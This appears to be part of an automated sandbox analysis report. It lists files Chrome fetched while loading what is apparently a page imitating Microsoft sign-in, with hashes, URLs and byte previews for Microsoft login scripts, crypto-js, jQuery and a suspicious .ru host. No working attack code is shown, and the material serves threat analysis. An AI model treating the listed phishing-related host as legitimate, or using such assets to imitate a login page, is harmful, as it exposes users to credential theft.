                                                                Entropy (8bit):4.068159130770306
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPl/IzIjlpBxl/k4E08up:6v/lhPOMjTB7Tp
                                                                MD5:C3E9ABEBD8C535B8DB9A61E5ABCDA1F1
                                                                SHA1:DA9A075B532D8B79D7B101A8B0A5E59B5CC729C1
                                                                SHA-256:C7516350FC5247A62AAA1E5594A96194226AED2B6E356CE4372E5D7800B4761E
                                                                SHA-512:7F71ED2371D52495C6ACC69DE846D5128B9EFFA73731593F5F0B3A8EB0563E93A01E1BA13D5B3552D5DC90CF3F43E5F7428F830E257833815A7B2E71D85EEFAC
                                                                Malicious:false
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe714c69d748c29/1736285766203/aPZ_CcXDlBoyNcS
                                                                Preview:.PNG........IHDR...8...W......F......IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                Category:dropped
                                                                Size (bytes):49911
                                                                Entropy (8bit):7.994516776763163
                                                                Encrypted:true
                                                                SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                Malicious:false
                                                                Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):3452
                                                                Entropy (8bit):5.117912766689607
                                                                Encrypted:false
                                                                SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                Malicious:false
                                                                URL:https://login.live.com/Me.htm?v=3
                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                Category:downloaded
                                                                Size (bytes):122515
                                                                Entropy (8bit):7.997419459076181
                                                                Encrypted:true
                                                                SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                MD5:AC9A6ED508328361A4C9530325A94076
                                                                SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:downloaded
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                URL:https://oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru/bGrWZhCIwGpWkaIdpPnuUFfslfCeBeDRKHZKADKCNXZXAZCXUXPAEARFZCXPKUBHYWRMDRDNWLYJRUHRJRDKA
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                Category:downloaded
                                                                Size (bytes):621
                                                                Entropy (8bit):7.673946009263606
                                                                Encrypted:false
                                                                SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                Category:dropped
                                                                Size (bytes):122515
                                                                Entropy (8bit):7.997419459076181
                                                                Encrypted:true
                                                                SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                MD5:AC9A6ED508328361A4C9530325A94076
                                                                SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                Malicious:false
                                                                Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                Category:downloaded
                                                                Size (bytes):49911
                                                                Entropy (8bit):7.994516776763163
                                                                Encrypted:true
                                                                SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                Category:downloaded
                                                                Size (bytes):5525
                                                                Entropy (8bit):7.961202222662501
                                                                Encrypted:false
                                                                SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):96
                                                                Entropy (8bit):5.220277803943091
                                                                Encrypted:false
                                                                SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWLsnk:NciczBdTFsJFoM+q6Mk
                                                                MD5:46520767C8D53BEFDB7688E66411794F
                                                                SHA1:964DB4925CE2A3D3C74329F9E7DE422EAB1CB4C0
                                                                SHA-256:2A3BB51F716E053996B41395A6E2F4F49419754C324C02C6693BAFD449867E3D
                                                                SHA-512:59ED863313B71B668AC6A6516162A07AC01F1E882747171F555592DE64B2D0DEB8A9CFA29BF014A1D23147D760EA573295A9C4E829BA6AF3708CC3BE3B78CF19
                                                                Malicious:false
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O34nPCJcXRABGP////8P
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:dropped
                                                                Size (bytes):3620
                                                                Entropy (8bit):6.867828878374734
                                                                Encrypted:false
                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                Malicious:false
                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:downloaded
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                Category:downloaded
                                                                Size (bytes):17174
                                                                Entropy (8bit):2.9129715116732746
                                                                Encrypted:false
                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47520)
                                                                Category:dropped
                                                                Size (bytes):47521
                                                                Entropy (8bit):5.398500199255723
                                                                Encrypted:false
                                                                SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                MD5:301F68F3D8317AB22D4021E266C9A853
                                                                SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                Malicious:false
                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                Category:dropped
                                                                Size (bytes):16345
                                                                Entropy (8bit):7.98960525258912
                                                                Encrypted:false
                                                                SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                Malicious:false
